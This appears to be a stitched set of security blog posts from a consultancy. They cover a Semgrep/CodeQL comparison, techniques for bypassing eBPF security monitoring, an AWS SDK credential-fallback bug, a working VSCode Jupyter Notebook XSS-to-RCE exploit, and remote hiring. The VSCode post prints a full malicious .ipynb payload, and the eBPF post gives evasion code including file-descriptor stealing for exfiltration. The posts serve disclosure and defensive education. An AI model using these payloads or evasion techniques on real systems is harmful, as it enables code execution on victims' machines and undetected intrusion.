  1. For the purposes of this exercise, TN = Total .go files - TP (890-15) = 875, since we are assuming all those files are free of vulnerabilities. For the Semgrep case, the value is irrelevant for the rate calculations, since no false positives were found.

  2. Semgrep in --config auto mode resulted in thousands of findings when run against our client’s code, as opposed to tens of findings when limiting the scans to security-specific tests on Golang only. We cite this to underscore that results will vary greatly depending on the code tested and the rules applied. That reduction in scope resulted in no false positives among the manually reviewed results.

  3. For CodeQL, approximately 25% of the files were not scanned due to issues with the tool.

  4. CodeQL encountered many errors during file compilation. 63 out of 74 Go files generated errors while being extracted to CodeQL’s database. This means that the analysis was performed on less data, and most files were only partially analyzed by CodeQL. This caused the CodeQL scan to produce significantly fewer findings than expected.

Conclusion

Obviously there could be some bias, but if you’d like another opinion, the creators of Semgrep have also provided a comparison with CodeQL on their website, particularly in this section: “How is Semgrep different from CodeQL?”.

Not surprisingly, in the end, we still feel Semgrep is a better tool for our use as a boutique security consultancy doing high-quality manual audits. We don’t always have access to all the source code we’d need to use CodeQL, the process of setting up scans is more laborious and time consuming in CodeQL, we can manually vet findings ourselves (so a few extra findings aren’t a major issue for us), and we can use Semgrep for free. If an organization’s use-case is more aligned with our client’s - being an organization that is willing to invest the time and effort, is particularly sensitive to false positives (e.g., running a scan during CI/CD) and doesn’t mind paying for the licensing - CodeQL might be a better choice for them.

On Bypassing eBPF Security Monitoring

10 October 2022 at 22:00

There are many security solutions available today that rely on the Extended Berkeley Packet Filter (eBPF) features of the Linux kernel to monitor kernel functions. This paradigm shift in monitoring technologies is driven by a variety of reasons, chief among them the performance needs of an increasingly cloud-dominated world. The Linux kernel has always had kernel tracing capabilities such as kprobes (2.6.9), ftrace (2.6.27 and later), perf (2.6.31), or uprobes (3.5), but with BPF it’s finally possible to run kernel-level programs on events and consequently modify the state of the system, without needing to write a kernel module. This has dramatic implications for any attacker looking to compromise a system and go undetected, opening new areas of research and application. Nowadays, eBPF-based programs are used for DDoS mitigation, intrusion detection, container security, and general observability.

In 2021, Teleport introduced a new feature called Enhanced Session Recording to close some monitoring gaps in Teleport’s audit abilities. All reported issues were promptly fixed, mitigated or documented, as described in their public Q4 2021 report. Below you can see an illustration of how we managed to bypass eBPF-based controls, along with some ideas on how red teams or malicious actors could evade these new intrusion detection mechanisms. These techniques can be generally applied to other targets when attempting to bypass any eBPF-based security monitoring solution:

A few words on how eBPF works


eBPF schema

Extended BPF programs are written in a high-level language and compiled into eBPF bytecode using a toolchain. A user mode application loads the bytecode into the kernel using the bpf() syscall, where the eBPF verifier performs a number of checks to ensure the program is “safe” to run in the kernel. This verification step is critical: eBPF exposes a path for unprivileged users to execute in ring 0. Since allowing unprivileged users to run code in the kernel is a ripe attack surface, several pieces of past research focused on local privilege escalation (LPE) exploits, which we won’t cover in this blog post. After the program is loaded, the user mode application attaches it to a hook point, and the program is executed whenever that hook point (event) is hit. The program can also be JIT compiled into native assembly instructions in some cases. User mode applications can interact with, and get data from, the eBPF program running in the kernel using eBPF maps and eBPF helper functions.
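To make this flow more concrete, here is a minimal sketch of the user-mode side based on the popular github.com/cilium/ebpf library. The object file name (tracer.o) and program name (trace_execve) are assumptions for illustration, not part of any specific product:

package main

import (
	"log"

	"github.com/cilium/ebpf"
	"github.com/cilium/ebpf/link"
)

func main() {
	// Load compiled eBPF bytecode (e.g., built with clang -target bpf);
	// this is where the bpf() syscall and the in-kernel verifier come in
	coll, err := ebpf.LoadCollection("tracer.o")
	if err != nil {
		log.Fatal(err) // e.g., the verifier rejected the program
	}
	defer coll.Close()

	// Attach the program to a kprobe hook point; from now on it runs
	// every time the hooked kernel function is hit
	kp, err := link.Kprobe("sys_execve", coll.Programs["trace_execve"], nil)
	if err != nil {
		log.Fatal(err)
	}
	defer kp.Close()
}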

Common shortcomings & potential bypasses (here be dragons)

1. Understand which events are caught

While eBPF is fast (much faster than auditd), there are plenty of interesting areas that can’t be reasonably instrumented with BPF for performance reasons. Depending on what the security monitoring solution wants to protect the most (e.g., network communication vs. executions vs. filesystem operations), there may be areas where excessive probing would lead to a performance overhead that pushes the development team to ignore them. This depends on how the endpoint agent is designed and implemented, so carefully auditing the code security of the eBPF program is paramount.

1.1 Execution bypasses

By way of example, a simple monitoring solution could decide to hook only the execve system call. Contrary to popular belief, multiple ELF-based Unix-like kernels don’t need a file on disk to load and run code, even if they usually require one. One way to achieve this is by using a technique called reflective loading. Reflective loading is an important post-exploitation technique usually used to avoid detection and execute more complex tools in locked-down environments. The man page for execve() states: “execve() executes the program pointed to by filename…”, and goes on to say that “the text, data, bss, and stack of the calling process are overwritten by that of the program loaded”. This overwriting doesn’t necessarily have to be something that the Linux kernel holds a monopoly over, unlike filesystem access or any number of other things. Because of this, the execve() system call can be mimicked in userland with minimal difficulty. Creating a new process image is therefore a simple matter of:

  • cleaning out the address space;
  • checking for, and loading, the dynamic linker;
  • loading the binary;
  • initializing the stack;
  • determining the entry point and
  • transferring control of execution.

By following these six steps, a new process image can be created and run. Since this technique was initially reported in 2004, the process has been streamlined and popularized by off-the-shelf (OTS) post-exploitation tools. As anticipated, an eBPF program hooking execve would not be able to catch this, since this custom userland exec would effectively replace the existing process image within the current address space with a new one. In this way, userland exec mimics the behavior of the system call execve(). However, because it operates in userland, the kernel process structures which describe the process image remain unchanged.

Other system calls may go unmonitored and decrease the detection capabilities of the monitoring solution. Some of these are clone, fork, vfork, creat, or execveat.

Another potential bypass may be present if the BPF program is naive and trusts the execve syscall argument referencing the complete path of the file that is being executed. An attacker could create symbolic links of Unix binaries in different locations and execute them - thus tampering with the logs.
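As a toy illustration of the symlink trick, the following Go sketch executes /bin/sh through an innocuous-looking path (the paths are arbitrary):

package main

import (
	"os"
	"os/exec"
)

func main() {
	// A naive probe that logs only the execve path argument will record
	// "/tmp/updater" rather than the binary actually being run
	_ = os.Symlink("/bin/sh", "/tmp/updater")

	out, _ := exec.Command("/tmp/updater", "-c", "id").CombinedOutput()
	os.Stdout.Write(out)
}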

1.2 Network bypasses

Not hooking all the network-related syscalls can have its own set of problems. Some monitoring solutions may only want to hook the EGRESS traffic, while an attacker could still send data to a non-allowed host abusing other network-sensitive operations (see aa_ops at linux/security/apparmor/include/audit.h:78) related to INGRESS traffic:

  • OP_BIND, the bind() function shall assign a local socket address to a socket identified by descriptor socket that has no local socket address assigned.
  • OP_LISTEN, the listen() function shall mark a connection-mode socket, specified by the socket argument, as accepting connections.
  • OP_ACCEPT, the accept() function shall extract the first connection on the queue of pending connections, create a new socket with the same socket type protocol and address family as the specified socket, and allocate a new file descriptor for that socket.
  • OP_RECVMSG, the recvmsg() function shall receive a message from a connection-mode or connectionless-mode socket.
  • OP_SETSOCKOPT, the setsockopt() function shall set the option specified by the option_name argument, at the protocol level specified by the level argument, to the value pointed to by the option_value argument for the socket associated with the file descriptor specified by the socket argument. Interesting options for attackers are SO_BROADCAST, SO_REUSEADDR, SO_DONTROUTE.

Generally, the network monitoring should look at all socket-based operations similarly to AppArmor.

In case the same local user has a mix of monitored and unmonitored console sessions, it could be possible for an attacker in a monitored session to leverage open file descriptors and sockets to send data to restricted hosts. In 2020, the Linux kernel (version 5.6) introduced a new system call to achieve this, called pidfd_getfd. A small number of operating systems (like Ubuntu) enable the Yama security module, which limits file descriptor access to child-parent process relationships only. PoC code for abusing this function is available on Github (TheZ3ro/fdstealer).

File descriptor stealing using pidfd_getfd
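For reference, a hedged Go sketch of the same idea via golang.org/x/sys/unix (requires a kernel >= 5.6 and is subject to ptrace/Yama restrictions; the target PID and descriptor number below are placeholders):

package main

import (
	"fmt"

	"golang.org/x/sys/unix"
)

func main() {
	targetPid := 1337 // hypothetical unmonitored process of the same user
	targetFd := 3     // hypothetical socket descriptor open in that process

	pidfd, err := unix.PidfdOpen(targetPid, 0)
	if err != nil {
		panic(err)
	}

	// Duplicate the remote descriptor into this process: anything written
	// to it now travels over the victim's already-established socket
	stolen, err := unix.PidfdGetfd(pidfd, targetFd, 0)
	if err != nil {
		panic(err)
	}

	n, err := unix.Write(stolen, []byte("exfil via stolen socket\n"))
	fmt.Println(n, err)
}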

2. Delayed execution

If only active console sessions are monitored, eBPF programs may only live for the time span of the session. By delaying the execution of a command (through sleep, timeout, sar, vmstat, inotifywait, at, cron …) and quitting the session, it could be possible to completely evade the solution.

3. Evade scoped event monitoring based on cgroup

A security monitoring solution may only be interested in auditing a specific user or cgroup (such as in the context of a remote console session). Taking Teleport as an example, it achieves this by correlating every event to a session with control groups (cgroupv2 in particular). Control grouping is a Linux kernel feature to limit access to resources for a group of processes. It is used in many containerization technologies (behind the scenes, Docker creates a set of namespaces and control groups for the container) and its peculiarity is that all child processes keep the cgroup ID of the parent process. When Teleport starts an SSH session, it first re-launches itself and places itself within a cgroup. This allows not only that process, but all future processes that Teleport launches, to be tracked with a unique ID. The BPF programs that Teleport runs have been updated to also emit the cgroup ID of the program executing them. The BPF script checks the value returned by bpf_get_current_cgroup_id() and only cares about the relevant session cgroup. The simplest evasion of this auditing strategy would be changing your cgroup ID, but an attacker needs to be root to achieve this. Meddling with the cgroupv2 pseudo file system or abusing the PAM configuration are also potential opportunities to affect the cgroup/session correlation.

Another technique involves getting re-parented to init. In the case of Teleport, when the bash process spawned by the session dies, its child processes become orphans and the Teleport process terminates its execution. When a child process becomes an orphan, it can be assigned to a different cgroup by the operating system under certain conditions (not having a tty, being a process group leader, joining a new process session). This allows an attacker to bypass the restrictions in place. The following PoC is an example of a bypass for this design:

  1. Open a new eBPF-monitored session
  2. Start tmux by executing the tmux command
  3. Detach from tmux by pressing CTRL+B and then D
  4. Kill the bash process that is tmux’s parent
  5. Re-attach to the tmux process by executing tmux attach. The process tree will now look like this:

CGroupV2 evasion PoC

As another attack avenue, leveraging processes run by different local users/cgroupv2 on the machine (abusing other daemons, delegating systemd) can also help an attacker evade this. This aspect obviously depends on the system hosting the monitoring solution. Protecting against this is tricky, since even if PR_SET_CHILD_SUBREAPER is set to ensure that the descendants can’t re-parent themselves to init, if the ancestor reaper dies or is killed (DoS), then processes in that service can escape their cgroup “container”. Any compromise of this privileged service process (or malfeasance by it) allows it to kill its hierarchy manager process and escape all control.

4. Memory limits and loss of events

BPF programs have a lot of constraints. Only 512 bytes of stack space are reserved for the eBPF program. Variables will get hoisted and instantiated at the start of execution, and if the script tries to dump syscall arguments or pt-regs, it will run out of stack space very quickly. If no workaround for the instruction limit is in place, it could be possible to push the script into retrieving something too big to ever fit on the stack, losing visibility as soon as the execution gets complicated. Even when workarounds are used (e.g., using multiple probes to trace the same events but capture different data, or splitting the code into multiple programs that call each other through a program map), there still may be a chance to abuse them. BPF programs are not meant to run forever; they have to stop at some point. By way of example, if a monitoring solution is running on CentOS 7 and trying to capture a process’s arguments and its environment variables, the emitted event could have too many argv and too many envp. Even in that case, you may miss some of them because the loop stops earlier. In these cases, the event data will be truncated. It’s important to note that these limitations differ based on the kernel where BPF is being run, and on how the endpoint agent is written.

Another peculiarity of eBPF is that it will drop events if they cannot be consumed fast enough, instead of dragging down the performance of the entire system. An attacker could abuse this by generating a sufficient number of events to fill up the perf ring buffer and overwrite data before the agent can read it.
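As a crude sketch, an attacker could simply hammer a traced hook point until the consumer falls behind (ring buffer sizes and consumer speed vary wildly, so the loop count below is arbitrary):

package main

import "os/exec"

func main() {
	// Each short-lived execution emits at least one event; a burst like
	// this can outpace the user mode reader and cause event drops
	for i := 0; i < 100000; i++ {
		_ = exec.Command("/bin/true").Run()
	}
}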

5. Never trust the userspace

The kernel-space understanding of a pid is not the same as the user-space understanding of a pid. If the eBPF script is trying to identify a file, the right way would be to get the inode number and device number, while a file descriptor won’t be as useful. Even in that case, probes could be subject to TOCTOU issues since they’ll be sending data to user mode that can easily change. If the script is instead tracing syscalls directly (using tracepoint or kprobe), it is probably stuck with file descriptors, and it could be possible to obfuscate executions by playing around with the current working directory and file descriptors (e.g., by combining fchdir, openat, and execveat).

6. Abuse the lack of seccomp-bpf & kernel discrepancies

eBPF-based monitoring solutions should protect themselves by using seccomp-BPF to permanently drop the ability to make the bpf() syscall before spawning a console session. If not, an attacker will have the ability to make the bpf() syscall to unload the eBPF programs used to track execution. Seccomp-BPF uses BPF programs to filter arbitrary system calls and their arguments (constants only, no pointer dereference).
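A minimal sketch of such a protection, using the github.com/seccomp/libseccomp-golang bindings (a default-allow policy that denies only bpf(2); how the session is then spawned is left out):

package main

import (
	"syscall"

	seccomp "github.com/seccomp/libseccomp-golang"
)

// dropBpf installs a filter that leaves everything working except bpf(2),
// which will fail with EPERM for this process and its descendants
func dropBpf() error {
	filter, err := seccomp.NewFilter(seccomp.ActAllow)
	if err != nil {
		return err
	}
	bpfCall, err := seccomp.GetSyscallFromName("bpf")
	if err != nil {
		return err
	}
	if err := filter.AddRule(bpfCall, seccomp.ActErrno.SetReturnCode(int16(syscall.EPERM))); err != nil {
		return err
	}
	// Loading is irreversible: once applied, an attacker in the session
	// can no longer unload the monitoring eBPF programs via bpf()
	return filter.Load()
}

func main() {
	if err := dropBpf(); err != nil {
		panic(err)
	}
	// ... spawn the monitored console session here ...
}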

Another thing to keep in mind when working with kernels, is that interfaces aren’t guaranteed to be consistent and stable. An attacker may abuse eBPF programs if they are not run on verified kernel versions. Usually, conditional compilation for a different architecture is very convoluted for these programs and you may find that the variant for your specific kernel is not targeted correctly. One common pitfall of using seccomp-BPF is filtering on system call numbers without checking the seccomp_data->arch BPF program argument. This is because on any architecture that supports multiple system call invocation conventions, the system call numbers may vary based on the specific invocation. If the numbers in the different calling conventions overlap, then checks in the filters may be abused. It is therefore important to ensure that the differences in bpf() invocations for each newly supported architecture are taken into account by the seccomp-BPF filter rules.

7. Interfere with the agents

Similarly to (6), it may be possible to interfere with the eBPF program loading in different ways, such as targeting the eBPF compiler libraries (BCC’s libbcc.so) or adapting other shared library preloading methods to tamper with the behavior of the solution’s legitimate binaries, ultimately performing harmful actions. If an attacker succeeds in altering the solution’s host environment, they can prepend to LD_LIBRARY_PATH a directory where they saved a malicious library having the same libbcc.so name and exporting all the used symbols (to avoid a runtime linkage error). When the solution starts, it gets linked with the malicious library instead of the legit bcc one. Defenses against this may include using statically linked programs, linking the library with its full path, or running the program in a controlled environment.

Many thanks to the whole Teleport Security Team, @FridayOrtiz, @Th3Zer0, & @alessandrogario for the inspiration and feedback while writing this blog post.

The Danger of Falling to System Role in AWS SDK Client

17 October 2022 at 22:00

CloudsecTidbit

Introduction to the series

When it comes to Cloud Security, the first questions usually asked are:

  • How is the infrastructure configured?
  • Are there any public buckets?
  • Are the VPC networks isolated?
  • Does it use proper IAM settings?

As application security engineers, we think that there are more interesting and context-related questions such as:

  • Which services provided by the cloud vendor are used?
  • Among the used services, which ones are directly integrated within the web platform logic?
  • How is the web application using such services?
  • How are they combined to support the internal logic?
  • Is the usage of services ever exposed or reachable by the end-user?
  • Are there any unintended behaviors caused by cloud services within the web platform?

By answering these questions, we usually find bugs.

Today we introduce the “CloudSecTidbits” series to share ideas and knowledge about such questions.

CloudSec Tidbits is a blogpost series showcasing interesting bugs found by Doyensec during cloud security testing activities. We’ll focus on times when the cloud infrastructure is properly configured, but the web application fails to use the services correctly.

Each blogpost will discuss a specific vulnerability resulting from an insecure combination of web and cloud related technologies. Every article will include an Infrastructure as Code (IaC) laboratory that can be easily deployed to experiment with the described vulnerability.

Tidbit # 1 - The Danger of Falling to System Role in AWS SDK Client

Amazon Web Services offers a comprehensive SDK to interact with their cloud services.

Let’s first examine how credentials are configured. The AWS SDKs require users to pass access / secret keys in order to authenticate requests to AWS. Credentials can be specified in different ways, depending on the different use cases.

When the AWS client is initialized without directly providing the credential’s source, the AWS SDK acts using a clearly defined logic. The AWS SDK uses a different credential provider chain depending on the base language. The credential provider chain is an ordered list of sources where the AWS SDK will attempt to fetch credentials from. The first provider in the chain that returns credentials without an error will be used.

For example, the SDK for the Go language will use the following chain:

  1. Environment variables
  2. Shared credentials file
  3. If the application uses an ECS task definition or RunTask API operation, the IAM role for tasks
  4. If the application is running on an Amazon EC2 instance, the IAM role for Amazon EC2

The code snippet below shows how the SDK retrieves the first valid credential provider:

Source: aws-sdk-go/aws/credentials/chain_provider.go

// Retrieve returns the credentials value or error if no provider returned
// without error.
//
// If a provider is found it will be cached and any calls to IsExpired()
// will return the expired state of the cached provider.
func (c *ChainProvider) Retrieve() (Value, error) {
	var errs []error
	for _, p := range c.Providers {
		creds, err := p.Retrieve()
		if err == nil {
			c.curr = p
			return creds, nil
		}
		errs = append(errs, err)
	}
	c.curr = nil

	var err error
	err = ErrNoValidProvidersFoundInChain
	if c.VerboseErrors {
		err = awserr.NewBatchError("NoCredentialProviders", "no valid providers in chain", errs)
	}
	return Value{}, err
}

After that first look at AWS SDK credentials, we can jump straight to the tidbit case.

Insecure AWS SDK Client Initialization In User Facing Functionalities - The Import From S3 Case

By testing several web platforms, we noticed that data import from external cloud services is a frequently recurring functionality. For example, some web platforms allow data import from third-party cloud storage services (e.g., AWS S3).

In this specific case, we will focus on a vulnerability identified in a web application that was using the AWS SDK for Go (v1) to implement an “Import Data From S3” functionality.

The user was able to make the platform fetch data from S3 by providing the following inputs:

  • S3 bucket name - Import from public source case;

    OR

  • S3 bucket name + AWS Credentials - Import from private source case;

The code paths were handled by a function similar to the following structure:

func getObjectsList(session *session.Session, config *aws.Config, bucket_name string) (*s3.ListObjectsV2Output, error) {

	// initialize or re-initialize the S3 client
	S3svc := s3.New(session, config)

	objectsList, err := S3svc.ListObjectsV2(&s3.ListObjectsV2Input{
		Bucket: aws.String(bucket_name),
	})

	return objectsList, err
}

func importData(req *http.Request) (success bool, err error) {

	srcConfig := &aws.Config{
		Region: &config.Config.AWS.Region,
	}

	req.ParseForm()
	bucket_name := req.Form.Get("bucket_name")
	accessKey := req.Form.Get("access_key")
	secretKey := req.Form.Get("secret_key")
	region := req.Form.Get("region")

	session_init, err := session.NewSession()
	if err != nil {
		return false, err
	}

	aws_config := &aws.Config{
		Region: aws.String(region),
	}

	if len(accessKey) > 0 {
		aws_config.Credentials = credentials.NewStaticCredentials(accessKey, secretKey, "")
	} else {
		aws_config.Credentials = credentials.AnonymousCredentials
	}

	objectList, err := getObjectsList(session_init, aws_config, bucket_name)
    
...

Despite using credentials.AnonymousCredentials when the user was not providing keys, the function had an interesting code path when ListObjectsV2 returned errors:

...
if err != nil {
		if _, ok := err.(awserr.Error); ok {
			aws_config.Credentials = nil
			getObjectsList(session_init, aws_config, bucket_name)
		}
}

The error handling was setting aws_config.Credentials = nil and trying again to list the objects in the bucket.

Looking at aws_config.Credentials = nil

Under those circumstances, the credentials provider chain will be used and eventually the instance’s IAM role will be assumed. In our case, the automatically retrieved credentials had full access to internal S3 buckets.

The Simple Deduction

If internal S3 bucket names are exposed to the end-user by the platform (e.g., via network traffic), the user can use them as input for the “import from S3” functionality and inspect their content directly in the UI.

Reading internal bucket names list extracted from Burp Suite history

In fact, it is not uncommon to see internal bucket names in an application’s traffic, as they are often used for internal data processing. In conclusion, providing internal bucket names resulted in their contents being fetched by the import functionality and added to the platform user’s data.

Different Client Credentials Initialization, Different Outcomes

AWS SDK clients require a Session object containing a Credentials object for initialization.

Described below are the three main ways to set the credentials needed by the client:

NewStaticCredentials

Within the credentials package, the NewStaticCredentials function returns a pointer to a new Credentials object wrapping static credentials.

Client initialization example with NewStaticCredentials:

package testing

import (
	"time"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
	"github.com/aws/aws-sdk-go/aws/session"
)

var session = session.Must(session.NewSession(&aws.Config{
	Credentials: credentials.NewStaticCredentials("AKIA….", "Secret", "Session"),
	Region:      aws.String("us-east-1"),
}))

Note: Credentials should not be hardcoded in code. Instead, retrieve them from a secure vault at runtime.

{ nil | Unspecified } Credentials Object

If the session client is initialized without specifying a credential object, the credential provider chain will be used. Likewise, if the Credentials object is directly initialized to nil, the same behavior will occur.

Client initialization example without Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Region:      aws.String("us-west-2"),
})))

Client initialization example with a nil valued Credential object:

svc := s3.New(session.Must(session.NewSession(&aws.Config{
		Credentials: <nil_object>,
		Region:      aws.String("us-west-2"),
})))

Outcome: Both initialization methods will result in relying on the credential provider chain. Hence, the credentials (probably very privileged) retrieved from the chain will be used. As shown in the aforementioned “Import From S3” case study, not being aware of such behavior led to the exfiltration of internal buckets.

AnonymousCredentials

The right function for the right tasks ;)

AWS SDK for Go API Reference is here to help:

“AnonymousCredentials is an empty Credential object that can be used as dummy placeholder credentials for requests that do not need to be signed. This AnonymousCredentials object can be used to configure a service not to sign requests when making service API calls. For example, when accessing public S3 buckets.”

svc := s3.New(session.Must(session.NewSession(&aws.Config{
  Credentials: credentials.AnonymousCredentials,
})))
// Access public S3 buckets.

Basically, the AnonymousCredentials object is just an empty Credential object:

// source: https://github.com/aws/aws-sdk-go/blob/main/aws/credentials/credentials.go#L60

// AnonymousCredentials is an empty Credential object that can be used as
// dummy placeholder credentials for requests that do not need to be signed.
//
// These Credentials can be used to configure a service not to sign requests
// when making service API calls. For example, when accessing public
// s3 buckets.
//
//     svc := s3.New(session.Must(session.NewSession(&aws.Config{
//       Credentials: credentials.AnonymousCredentials,
//     })))
//     // Access public S3 buckets.
var AnonymousCredentials = NewStaticCredentials("", "", "")

For cloud security auditors

The vulnerability could be also found in the usage of other AWS services.

While auditing cloud-driven web platforms, look for every code path involving an AWS SDK client initialization.

For every code path answer the following questions:

  1. Is the code path directly reachable from an end-user input point (feature or exposed API)?

    e.g., AWS credentials taken from the user settings page within the platform, or a user submitting a public AWS resource to be fetched/modified by the platform.

  2. How are the client’s credentials initialized?

    • credential provider chain - look for the machine-owned role in the chain
      • Is there a fall-back condition? Check whether the end-user can reach that code path with certain inputs. If the chain is used by default, go on and look at the role’s permissions
    • aws.Config structure as input parameter - look at the passed role’s permissions
  3. Can users abuse the functionality to make the platform use the privileged credentials on their behalf and point to private resources within the AWS account?

    e.g., “import from S3” functionality abused to import the infrastructure’s private buckets

For developers

Use AnonymousCredentials to configure the AWS SDK client when dealing with public resources.

From the official AWS documentation:

Using anonymous credentials will result in requests not being signed before sending them to the service. Any service that does not accept unsigned requests will return a service exception in this case.

When user-provided credentials are used to integrate with other cloud services, the platform should avoid implementing fall-back-to-system-role patterns. Ensure that the user-provided credentials are correctly set, to avoid ending up with aws.Config.Credentials = nil, because that would result in the client using the credentials provider chain → system role.
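A minimal fail-closed sketch using the same aws-sdk-go (v1) primitives shown above (function and variable names are illustrative, not from any specific codebase):

package importer

import (
	"errors"

	"github.com/aws/aws-sdk-go/aws"
	"github.com/aws/aws-sdk-go/aws/credentials"
)

// buildImportConfig never leaves Credentials unset: it either uses the
// user-supplied keys or explicitly stays anonymous, so the credential
// provider chain (and thus the system role) is never consulted
func buildImportConfig(accessKey, secretKey, region string) (*aws.Config, error) {
	cfg := &aws.Config{Region: aws.String(region)}

	switch {
	case accessKey != "" && secretKey != "":
		cfg.Credentials = credentials.NewStaticCredentials(accessKey, secretKey, "")
	case accessKey == "" && secretKey == "":
		// public-source import: unsigned requests only
		cfg.Credentials = credentials.AnonymousCredentials
	default:
		// partial input: fail closed instead of silently degrading
		return nil, errors.New("both access key and secret key are required")
	}
	return cfg, nil
}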

Hands-On IaC Lab

As promised in the series’ introduction, we developed a Terraform (IaC) laboratory to deploy a vulnerable dummy application and play with the vulnerability: https://github.com/doyensec/cloudsec-tidbits/

Stay tuned for the next episode!

Visual Studio Code Jupyter Notebook RCE

26 October 2022 at 22:00

I spent a few hours over the past weekend looking into the exploitation of this Visual Studio Code .ipynb Jupyter Notebook bug discovered by Justin Steven in August 2021.

Justin discovered a Cross-Site Scripting (XSS) vulnerability affecting the VSCode built-in support for Jupyter Notebook (.ipynb) files.

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src=x onerror='console.log(1)'>"}
        }
      ]
    }
  ]
}

His analysis details the issue and shows a proof of concept which reads arbitrary files from disk and then leaks their contents to a remote server; however, it is not a complete RCE exploit.

I could not find a way to leverage this XSS primitive to achieve arbitrary code execution, but someone more skilled with Electron exploitation may be able to do so. […]

Given our focus on ElectronJs (and many other web technologies), I decided to look into potential exploitation avenues.

As the first step, I took a look at the overall design of the application in order to identify the configuration of each BrowserWindow/BrowserView/Webview in use by VScode. Facilitated by ElectroNG, it is possible to observe that the application uses a single BrowserWindow with nodeIntegration:on.

ElectroNG VScode

This BrowserWindow loads content using the vscode-file protocol, which is similar to the file protocol. Unfortunately, our injection occurs in a nested sandboxed iframe as shown in the following diagram:

VScode BrowserWindow Design

In particular, our sandbox iframe is created using the following attributes:

allow-scripts allow-same-origin allow-forms allow-pointer-lock allow-downloads

By default, sandbox makes the browser treat the iframe as if it was coming from another origin, even if its src points to the same site. Thanks to the allow-same-origin attribute, this limitation is lifted. As long as the content loaded within the webview is also hosted on the local filesystem (within the app folder), we can access the top window. With that, we can simply execute code using something like top.require('child_process').exec('open /System/Applications/Calculator.app');

So, how do we place our arbitrary HTML/JS content within the application install folder?

Alternatively, can we reference resources outside that folder?

The answer comes from a recent presentation I watched at the latest Black Hat USA 2022 briefings. In exploiting CVE-2021-43908, TheGrandPew and s1r1us use a path traversal to load arbitrary files outside of VSCode installation path.

vscode-file://vscode-app/Applications/Visual Studio Code.app/Contents/Resources/app/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/somefile.html

Similarly to their exploit, we can attempt to leverage a postMessage reply to leak the path of the current user directory. In fact, our payload can be placed inside the malicious repository, together with the Jupyter Notebook file that triggers the XSS.

After a couple of hours of trial-and-error, I discovered that we can obtain a reference to the img tag triggering the XSS by forcing the execution during the onload event.

Path Leak VScode

With that, all of the ingredients are ready and I can finally assemble the final exploit.

var apploc = '/Applications/Visual Studio Code.app/Contents/Resources/app/'.replace(/ /g, '%20');
var repoloc;
window.top.frames[0].onmessage = event => {
    if(event.data.args.contents && event.data.args.contents.includes('<base href')){  
        var leakloc = event.data.args.contents.match('<base href=\"(.*)\"')[1];
        var repoloc = leakloc.replace('https://file%2B.vscode-resource.vscode-webview.net','vscode-file://vscode-app'+apploc+'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..');
        setTimeout(async()=>console.log(repoloc+'poc.html'), 3000)
        location.href=repoloc+'poc.html';
    }
};
window.top.postMessage({target: window.location.href.split('/')[2],channel: 'do-reload'}, '*');

To deliver this payload inside the .ipynb file, we still need to overcome one last limitation: the current implementation results in malformed JSON. The injection happens within a JSON file (double-quoted), and our JavaScript payload contains quoted strings as well as double-quotes used as a delimiter for the regular expression that extracts the path.

After a bit of tinkering, the easiest solution involves the backtick ` character instead of the quote for all JS strings.

The final pocimg.ipynb file looks like:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src='a445fff1d9fd4f3fb97b75202282c992.png' onload='var apploc = `/Applications/Visual Studio Code.app/Contents/Resources/app/`.replace(/ /g, `%20`);var repoloc;window.top.frames[0].onmessage = event => {if(event.data.args.contents && event.data.args.contents.includes(`<base href`)){var leakloc = event.data.args.contents.match(`<base href=\"(.*)\"`)[1];var repoloc = leakloc.replace(`https://file%2B.vscode-resource.vscode-webview.net`,`vscode-file://vscode-app`+apploc+`..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..`);setTimeout(async()=>console.log(repoloc+`poc.html`), 3000);location.href=repoloc+`poc.html`;}};window.top.postMessage({target: window.location.href.split(`/`)[2],channel: `do-reload`}, `*`);'>"}
        }
      ]
    }
  ]
}

By opening a malicious repository with this file, we can finally trigger our code execution.


The built-in Jupyter Notebook extension opts out of the protections given by the Workspace Trust feature introduced in Visual Studio Code 1.57, hence no further user interaction is required. For the record, this issue was fixed in VScode 1.59.1 and Microsoft assigned CVE-2021-26437 to it.

Recruiting Security Researchers Remotely

8 November 2022 at 23:00

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

Banner Recruiting Post

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process with a given candidate, we want to get to know them better. We want to understand their motivations for changing their workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

  • Knowledge of the English language for applicants who are not native speakers
  • Professionalism - although people come from different cultures, professionalism is international
  • Professional experience that indicates the candidate has the background to be successful in the relevant role with us
  • General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

